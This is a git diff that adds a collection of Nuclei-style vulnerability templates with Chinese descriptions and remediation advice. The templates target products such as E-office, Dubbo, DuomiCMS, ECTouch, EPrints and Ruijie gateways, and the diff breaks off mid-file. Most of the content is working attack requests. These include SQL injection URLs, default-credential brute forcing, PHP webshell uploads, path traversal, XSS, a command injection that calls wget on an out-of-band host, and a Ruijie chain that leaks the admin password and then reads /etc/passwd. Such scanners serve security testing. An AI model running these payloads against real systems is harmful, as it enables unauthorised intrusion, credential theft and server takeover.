b/config/51pwn/yaml/Drupal/CVE-2021-32682.yaml new file mode 100755 index 000000000..3e7e8f3a8 --- /dev/null +++ b/config/51pwn/yaml/Drupal/CVE-2021-32682.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-32682 +info: + name: elFinder 2.1.58 - Remote Code Execution + author: + - l0ne1y + description: |- + elFinder 代码执行漏洞 + elFinder是一套基于Drupal平台的、开源的AJAX文件管理器。该产品提供多文件上传、图像缩放等功能。 + + elFinder 存在安全漏洞,攻击者可利用该漏洞在托管elFinder PHP连接器的服务器上执行任意代码和命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/Studio-42/elFinder + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + condition: and + words: + - elfinder + - php/connector + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/admin/elfinder/elfinder-cke.html' + - '{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html' + - '{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html' + - '{{BaseURL}}/assets/elFinder/elfinder.html' + - '{{BaseURL}}/backend/elfinder/elfinder-cke.html' + - '{{BaseURL}}/elfinder/elfinder-cke.html' + - '{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html' + - '{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html' + - '{{BaseURL}}/uploads/elfinder/elfinder-cke.html' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Dubbo/dubbo-admin-default-login.yaml b/config/51pwn/yaml/Dubbo/dubbo-admin-default-login.yaml new file mode 100755 index 000000000..93dedc906 --- /dev/null +++ b/config/51pwn/yaml/Dubbo/dubbo-admin-default-login.yaml @@ -0,0 +1,41 @@ +id: dubbo-admin-default-login +info: + name: Dubbo Admin Default Login + author: + - l0ne1y + description: |- + Apache Dubbo 默认口令登录漏洞 + Apache Dubbo 是一款微服务框架,为大规模微服务实践提供高性能 RPC 通信、流量治理、可观测性等解决方案, 涵盖Java、Golang 等多种语言 SDK 实现。其web管理后台存在默认账户root/root,guest/guest + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + words: + - Dubbo Admin + - /sysinfo/versions + - '{{username}}'', ''/logout'')' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + password: + - guest + - root + username: + - guest + - root diff --git a/config/51pwn/yaml/DuomiCms/duomicms-sql-injection.yaml b/config/51pwn/yaml/DuomiCms/duomicms-sql-injection.yaml new file mode 100755 index 000000000..38ba9eaba --- /dev/null +++ b/config/51pwn/yaml/DuomiCms/duomicms-sql-injection.yaml @@ -0,0 +1,31 @@ +id: duomicms-sql-injection +info: + name: DuomiCMS SQL Injection + author: + - l0ne1y + description: |- + DuomiCms x3.0前台duomiphp/ajax.php文件存在SQL注入漏洞 + 多米(DuomiCms)影视管理系统是一套专为影视站长而设计的视频点播系统。 + + DuomiCms x3.0前台duomiphp/ajax.php文件存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + http://www.duomicms.net + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - e0ec043b3f9e198ec09041687e4d4e8d + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))' + method: GET diff --git "a/config/51pwn/yaml/E-ZKECO \345\256\211\345\205\250\347\262\276\347\273\206\345\214\226\347\256\241\347\220\206\344\272\221\345\271\263\345\217\260/CNVD-2020-57264.yaml" "b/config/51pwn/yaml/E-ZKECO \345\256\211\345\205\250\347\262\276\347\273\206\345\214\226\347\256\241\347\220\206\344\272\221\345\271\263\345\217\260/CNVD-2020-57264.yaml" new file mode 100755 index 000000000..29a1b253a --- /dev/null +++ "b/config/51pwn/yaml/E-ZKECO \345\256\211\345\205\250\347\262\276\347\273\206\345\214\226\347\256\241\347\220\206\344\272\221\345\271\263\345\217\260/CNVD-2020-57264.yaml" @@ -0,0 +1,27 @@ +id: CNVD-2020-57264 +info: + name: 北京中控科技发展有限公司时间&安全精细化管理云平台存在任意文件下载漏洞 + author: + - l0ne1y + description: |- + E-zkeco 安全精细化管理云平台存在任意文件下载漏洞 + 北京中控科技发展有限公司是时间安全管理、风险投资、绿色农业、矿业开采、OEM生产等领域的企业。北京中控科技发展有限公司时间&安全精细化管理云平台存在任意文件下载漏洞。攻击者可利用该漏洞读取任意文件。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:http://www.zksoftware.com/ + + 临时修复建议: +
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 +requests: +- matchers: + - type: word + words: + - for 16-bit app support + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/iclock/ccccc/windows/win.ini' + method: GET diff --git a/config/51pwn/yaml/E-office/CNVD-2021-49104.yaml b/config/51pwn/yaml/E-office/CNVD-2021-49104.yaml new file mode 100755 index 000000000..48bed7dfe --- /dev/null +++ b/config/51pwn/yaml/E-office/CNVD-2021-49104.yaml @@ -0,0 +1,41 @@ +id: CNVD-2021-49104 +info: + name: Pan Micro E-office File Uploads + author: + - l0ne1y + description: |- + 泛微e-office存在文件上传漏洞 + 泛微e-office是泛微旗下的一款标准协同移动办公平台。泛微e-office存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 + severity: high + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁\n厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip + \n\n临时修复方案:
文件上传:
1、服务器端将文件上传目录直接设置为不可执行。
2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME + Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。
3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。
4、单独设置文件服务器的域名。
5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。
6、修复服务器可能存在的解析漏洞。
7、严格限制可以修改服务器配置的文件上传如:.htaccess。
8、隐藏上传文件路径。
9、升级Web Server。
10、及时修复Web上传代码。
11、不能有本地文件包含漏洞。
12、注意0x00截断攻击(PHP更新到最新版本)。" +requests: +- matchers: + - type: word + part: body + words: + - 94d01a2324ce38a2e29a629c54190f67 + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- + - | + GET /images/logo/logo-eoffice.php HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/E-office/E-office-do_excel-FileUpload.yaml b/config/51pwn/yaml/E-office/E-office-do_excel-FileUpload.yaml new file mode 100755 index 000000000..14b3199fd --- /dev/null +++ b/config/51pwn/yaml/E-office/E-office-do_excel-FileUpload.yaml @@ -0,0 +1,28 @@ +id: E-office-do_excel-FileUpload +info: + name: 泛微E-office do_excel.php任意文件写入漏洞 + author: + - l0ne1y + description: |- + 泛微E-office do_excel.php任意文件写入漏洞 + 泛微OA E-office 系统存在任意文件写入漏洞,攻击者可利用该漏洞远程写入自己的Webshell到网站程序目录中,达到控制网站的效果。 + severity: critical + remediation: |- + ## 官方修复方案 + 升级至最新版本。 + ## 临时修复方案 + 联系客服获取修复补丁。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body_2,"XSsdasdqSD2ssasd2SDQ") + matchers-condition: and + path: + - '{{BaseURL}}/general/charge/charge_list/do_excel.php' + - '{{BaseURL}}/general/charge/charge_list/excel.php' + method: POST + body: html= + req-condition: true diff --git a/config/51pwn/yaml/E-office/E-office10-Upload.yaml b/config/51pwn/yaml/E-office/E-office10-Upload.yaml new file mode 100755 index 000000000..f1bfcb713 --- /dev/null +++ b/config/51pwn/yaml/E-office/E-office10-Upload.yaml @@ -0,0 +1,50 @@ +id: E-office10-Upload +info: + name: 泛微 eoffice10 前台文件上传 + author: + - l0ne1y + description: |- + 泛微 eoffice10 前台文件上传 + 泛微 e-office10 系统存在前台文件上传漏洞,攻击者可利用该漏洞上传Webshell达到获取网站管理权限的目的。 + severity: critical + remediation: |- + ## 官方修复方案 + 升级至最新版本. +requests: +- matchers: + - type: word + words: + - Xasr2sda42342sdasd221 + raw: + - | + POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 + Host: {{Host}} + Content-Length: 378 + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Origin: null + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/91.0.4472.77 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 + Connection: close + + ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs + Content-Disposition: form-data; name="FileData"; filename="1.jpg" + Content-Type: image/jpeg + + ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs + Content-Disposition: form-data; name="FormData" + {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{verify}}.php'} + ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- + - | + GET /eoffice10/server/public/iWebOffice2015/Document/{{verify}}.php HTTP/1.1 + Host: {{Host}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/91.0.4472.77 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 + Connection: close +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/E-office/wooyun-2010-087500.yaml b/config/51pwn/yaml/E-office/wooyun-2010-087500.yaml new file mode 100755 index 000000000..508a24c54 --- /dev/null +++ b/config/51pwn/yaml/E-office/wooyun-2010-087500.yaml @@ -0,0 +1,34 @@ +id: wooyun-2010-087500 +info: + name: 泛微e-office数据库配置文件下载 + author: + - 折跃 + description: |- + 泛微 E-office 数据库配置文件泄露漏洞 + 泛微 E-office是泛微协同办公产品系列的成员之一,贴合办公应用实际需求,实行通用化的产品设计。 + + 泛微 E-office中存在数据库配置文件泄露漏洞。远程攻击者可以利用该漏洞获取数据库账密等信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,'datapassword') + - contains(body,'dataurl') + path: + - '{{BaseURL}}/mysql_config.ini' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git a/config/51pwn/yaml/E-office/wooyun-2015-0125282.yaml b/config/51pwn/yaml/E-office/wooyun-2015-0125282.yaml new file mode 100755 index 000000000..2def579a1 --- /dev/null +++ b/config/51pwn/yaml/E-office/wooyun-2015-0125282.yaml @@ -0,0 +1,70 @@ +id: wooyun-2015-0125282 +info: + name: 泛微 E-office uploadify.php 任意文件上传漏洞 + author: + - 折跃 + description: |- + 泛微 E-office uploadify.php 任意文件上传漏洞 + 泛微 E-office是泛微协同办公产品系列的成员之一,贴合办公应用实际需求,实行通用化的产品设计。 + + 泛微 E-office中存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - status_code_2==200 + - contains(body_2,verify) + extractors: + - name: uploadFile + type: regex + regex: + - (.*?) + group: 1 + part: body + internal: true + raw: + - | + POST {{varPath}} HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Origin: null + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------17911526049915903093347900923 + + -----------------------------17911526049915903093347900923 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: application/octet-stream + + + -----------------------------17911526049915903093347900923 + - | + GET /attachment/{{uploadFile}}.php HTTP/1.1 + Host: {{Hostname}} + attack: batteringram + payloads: + varPath: + - /general/weibo/javascript/LazyUploadify/uploadify.php + - /inc/jquery/uploadify/uploadify.php + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/E-office/wooyun-2015-0125592.yaml b/config/51pwn/yaml/E-office/wooyun-2015-0125592.yaml new file mode 100755 index 000000000..a1f26b678 --- /dev/null +++ b/config/51pwn/yaml/E-office/wooyun-2015-0125592.yaml @@ -0,0 +1,72 @@ +id: wooyun-2015-0125592 +info: + name: 泛微e-office webservice 任意文件上传漏洞检测 + author: + - 折跃 + description: |- + 泛微 E-office webservice 任意文件上传漏洞 + 泛微 E-office是泛微协同办公产品系列的成员之一,贴合办公应用实际需求,实行通用化的产品设计。 + + 泛微 E-office中存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - status_code_2==200 + - contains(body_2,verify) + extractors: + - name: uploadFile + type: regex + regex: + - (.*?)\*test\.php + group: 1 + part: body + internal: true + raw: + - | + POST /{{varPath}} HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Origin: null + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------17911526049915903093347900923 + + -----------------------------17911526049915903093347900923 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: application/octet-stream + + + -----------------------------17911526049915903093347900923 + - | + GET /attachment/{{uploadFile}}/test.php HTTP/1.1 + Host: {{Hostname}} + attack: batteringram + payloads: + varPath: + - webservice/upload.php + - webservice/upload/upload.php + - webservice-json/upload/upload.php + - webservice-xml/upload/upload.php + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/E-office/wooyun-2015-0125638.yaml b/config/51pwn/yaml/E-office/wooyun-2015-0125638.yaml new file mode 100755 index 000000000..7a36a5a13 --- /dev/null +++ b/config/51pwn/yaml/E-office/wooyun-2015-0125638.yaml @@ -0,0 +1,64 @@ +id: wooyun-2015-0125638 +info: + name: 泛微e-office officeserver.php 任意文件上传漏洞 + author: + - 折跃 + description: |- + 泛微 E-office officeserver.php 任意文件上传漏洞 + 泛微 E-office是泛微协同办公产品系列的成员之一,贴合办公应用实际需求,实行通用化的产品设计。 + + 泛微 E-office中存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - status_code_2==200 + - contains(body_2,verify) + raw: + - | + POST /{{varPath}}?OPTION=SAVEFILE&FILENAME={{fileName}}.php HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Origin: null + Upgrade-Insecure-Requests: 1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------17911526049915903093347900923 + + -----------------------------17911526049915903093347900923 + Content-Disposition: form-data; name="Filedata"; filename="{{fileName}}.php" + Content-Type: application/octet-stream + + + -----------------------------17911526049915903093347900923 + - | + GET /attachment/{{fileName}}.php HTTP/1.1 + Host: {{Hostname}} + attack: batteringram + payloads: + varPath: + - iweboffice/officeserver.php + - iweboffice/officeserver2.php + req-condition: true + stop-at-first-match: true +variables: + fileName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/ECTouch CMS/etouch-v2-sqli.yaml b/config/51pwn/yaml/ECTouch CMS/etouch-v2-sqli.yaml new file mode 100755 index 000000000..8ad78aa0a --- /dev/null +++ b/config/51pwn/yaml/ECTouch CMS/etouch-v2-sqli.yaml @@ -0,0 +1,28 @@ +id: etouch-v2-sqli +info: + name: Ectouch v2 SQL Injection + author: + - l0ne1y + description: |- + Ectouch V2 存在SQL注入漏洞 + ECTouch v2 中的 index.phP页面存在SQL注入。 + severity: high + remediation: |- + 官方修复方案: + 升级至最新版本: + https://www.ectouch.cn/ + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - c4ca4238a0b923820dcc509a6f75849b + matchers-condition: and + path: + - '{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''''' + method: GET diff --git a/config/51pwn/yaml/EPrints/CVE-2021-26475.yaml b/config/51pwn/yaml/EPrints/CVE-2021-26475.yaml new file mode 100755 index 000000000..490d4a363 --- /dev/null +++ b/config/51pwn/yaml/EPrints/CVE-2021-26475.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-26475 +info: + name: EPrints 3.4.2 XSS + author: + - l0ne1y + description: |- + EPrints 跨站脚本漏洞 + EPrints是英国Eprints的应用软件提供一个资源浏览器 + + EPrints 3.4.2 存在跨站脚本漏洞,该漏洞源于cgi/cal URI。 + severity: medium + remediation: | + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://files.eprints.org/2548/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E' + method: GET diff --git a/config/51pwn/yaml/EWEB Gateway/CNVD-2021-09650.yaml b/config/51pwn/yaml/EWEB Gateway/CNVD-2021-09650.yaml new file mode 100755 index 000000000..7a1172b84 --- /dev/null +++ b/config/51pwn/yaml/EWEB Gateway/CNVD-2021-09650.yaml @@ -0,0 +1,41 @@ +id: CNVD-2021-09650 +info: + name: Ruijie EWEB Gateway Platform - Remote Command Injection + author: + - l0ne1y + tags: + - ruijie + - cnvd + - cnvd2021 + - rce + description: |- + 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞 + 锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。 + + 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 + reference: + - http://j0j0xsec.top/2021/04/22/%e9%94%90%e6%8d%b7eweb%e7%bd%91%e5%85%b3%e5%b9%b3%e5%8f%b0%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e/ + severity: critical + classification: + cwe-id: + - cwe-77 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + remediation: |- + 官方修复方案: + 1.厂商已发布了漏洞修复程序,请及时关注更新: + https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/ +requests: +- matchers: + - type: word + part: interactsh_protocol + name: http + words: + - http + raw: + - | + POST /guest_auth/guestIsUp.php + Host: {{Hostname}} + + mac=1&ip=127.0.0.1|wget {{interactsh-url}} + unsafe: true diff --git a/config/51pwn/yaml/EWEB Gateway/ruijie-eg-password-leak.yaml b/config/51pwn/yaml/EWEB Gateway/ruijie-eg-password-leak.yaml new file mode 100755 index 000000000..f9ccd0456 --- /dev/null +++ b/config/51pwn/yaml/EWEB Gateway/ruijie-eg-password-leak.yaml @@ -0,0 +1,47 @@ +id: ruijie-eg-password-leak +info: + name: Ruijie EG Easy Gateway Password Leak + author: + - l0ne1y + tags: + - ruijie + - exposure + description: "锐捷EG易网关存在 CLI命令注入导致管理员账号密码泄露漏洞 \n锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。\n锐捷EG易网关 + login.php存在 CLI命令注入,导致管理员账号密码泄露漏洞。" + reference: + - http://wiki.peiqi.tech/peiqi_wiki/%e7%bd%91%e7%bb%9c%e8%ae%be%e5%a4%87%e6%bc%8f%e6%b4%9e/%e9%94%90%e6%8d%b7/%e9%94%90%e6%8d%b7eg%e6%98%93%e7%bd%91%e5%85%b3%20%e7%ae%a1%e7%90%86%e5%91%98%e8%b4%a6%e5%8f%b7%e5%af%86%e7%a0%81%e6%b3%84%e9%9c%b2%e6%bc%8f%e6%b4%9e.html + - https://www.ruijienetworks.com + severity: high + remediation: |- + 官方修复方案: + 1.建议用户到官方获取最新补丁或者最新版本程序: + https://www.ruijienetworks.com +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"data":' + - '"status":1' + - admin + - type: word + part: header + words: + - text/json + - type: status + status: + - 200 + extractors: + - type: regex + regex: + - admin ([a-zA-Z0-9#@]+)", + group: 1 + matchers-condition: and + raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin?show+webmaster+user diff --git a/config/51pwn/yaml/EWEB Gateway/ruijie-eg-rce.yaml b/config/51pwn/yaml/EWEB Gateway/ruijie-eg-rce.yaml new file mode 100755 index 000000000..b5e084ee8 --- /dev/null +++ b/config/51pwn/yaml/EWEB Gateway/ruijie-eg-rce.yaml @@ -0,0 +1,56 @@ +id: ruijie-eg-rce +info: + name: Ruijie EG cli.php RCE + author: + - l0ne1y + tags: + - ruijie + - rce + description: "锐捷 EG易网关 cli.php 远程命令执行漏洞 \n锐捷EG易网关 cli.php存在命令执行漏洞,配合 锐捷EG易网关 管理员账号密码泄露漏洞 + 达到RCE控制服务器。" + reference: + - /~https://github.com/peiqi0/peiqi-wiki-poc/blob/peiqi/peiqi_wiki/%e7%bd%91%e7%bb%9c%e8%ae%be%e5%a4%87%e6%bc%8f%e6%b4%9e/%e9%94%90%e6%8d%b7/%e9%94%90%e6%8d%b7eg%e6%98%93%e7%bd%91%e5%85%b3%20cli.php%20%e8%bf%9c%e7%a8%8b%e5%91%bd%e4%bb%a4%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e.md + - https://www.ruijienetworks.com + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.ruijienetworks.com +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - nobody:.*:0:0 + - type: status + status: + - 200 + extractors: + - name: admin + type: regex + regex: + - admin ([a-zA-Z0-9#@]+)", + group: 1 + internal: true + matchers-condition: and + raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin?show+webmaster+user + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password={{admin}} + - | + POST /cli.php?a=shell HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + notdelay=true&command=cat /etc/passwd + cookie-reuse: true diff --git a/config/51pwn/yaml/EWEB Gateway/ruijie-networks-rce.yaml b/config/51pwn/yaml/EWEB Gateway/ruijie-networks-rce.yaml new file mode 100755 index 000000000..ecfa7bfab --- /dev/null +++ b/config/51pwn/yaml/EWEB 